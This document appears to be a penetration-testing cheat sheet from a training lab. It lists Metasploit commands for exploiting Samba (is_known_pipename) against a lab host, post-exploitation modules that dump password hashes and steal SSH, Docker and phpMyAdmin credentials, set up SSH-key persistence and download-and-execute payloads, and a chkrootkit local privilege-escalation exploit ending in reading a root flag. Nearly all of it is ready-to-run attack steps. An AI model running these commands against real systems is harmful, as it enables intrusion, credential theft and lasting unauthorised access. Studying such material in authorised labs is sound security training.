Linux
Common Metasploit Modules
msfconsole
use exploit/linux/samba/is_known_pipename
set RHOST demo.ine.local
check
exploit -z
post/linux/gather/enum_configs
# Enumerates configuration files on a Linux target.
post/multi/gather/env
# Gathers environment variables from the target system across multiple platforms.
post/linux/gather/enum_network
# Enumerates network-related information such as interfaces and IP addresses on a Linux system.
post/linux/gather/enum_protections
# Gathers information on security protections (e.g., AppArmor, SELinux) on a Linux target.
post/linux/gather/enum_system
# Enumerates system-level information such as OS details and kernel version on a Linux target.
post/linux/gather/checkcontainer
# Checks if the Linux target is running inside a container.
post/linux/gather/checkvm
# Detects if the Linux target is running inside a virtual machine.
post/linux/gather/enum_users_history
# Enumerates the user history (e.g., bash history) on a Linux target to find potential clues.
post/multi/manage/system_session
# Manages and interacts with system-level sessions across multiple platforms.
post/linux/manage/download_exec
# Downloads and executes a payload on a Linux target system.
post/multi/gather/ssh_creds
# Gathers SSH credentials (username/password or private keys) from the target system across multiple platforms.
post/multi/gather/docker_creds
# Gathers Docker credentials, including tokens or keys, from the target system.
post/linux/gather/hashdump
# Dumps password hashes from the Linux target system, useful for offline cracking.
post/linux/gather/ecryptfs_creds
# Gathers credentials stored in encrypted form using eCryptfs on a Linux target.
post/linux/gather/enum_psk
# Enumerates pre-shared keys (PSKs) used in VPNs or wireless networks on a Linux system.
post/linux/gather/enum_xchat
# Retrieves credentials stored by the XChat IRC client on the target Linux system.
post/linux/gather/phpmyadmin_credsteal
# Steals stored credentials from PHPMyAdmin configuration on a Linux target.
post/linux/gather/pptpd_chap_secrets
# Extracts CHAP secrets (used for VPN authentication) from the pptpd configuration on a Linux system.
post/linux/manage/sshkey_persistence
# Creates persistent SSH key for maintaining access to the compromised Linux system.
Rootkit Scanner
ps aux
cat /bin/check-down
command -v chkrootkit
/bin/chkrootkit -V
searchsploit chkrootkit 0.49
use exploit/unix/local/chkrootkit
set CHKROOTKIT /bin/chkrootkit
set session 1
set LHOST [IP]
exploit
cat /root/flag
Last updated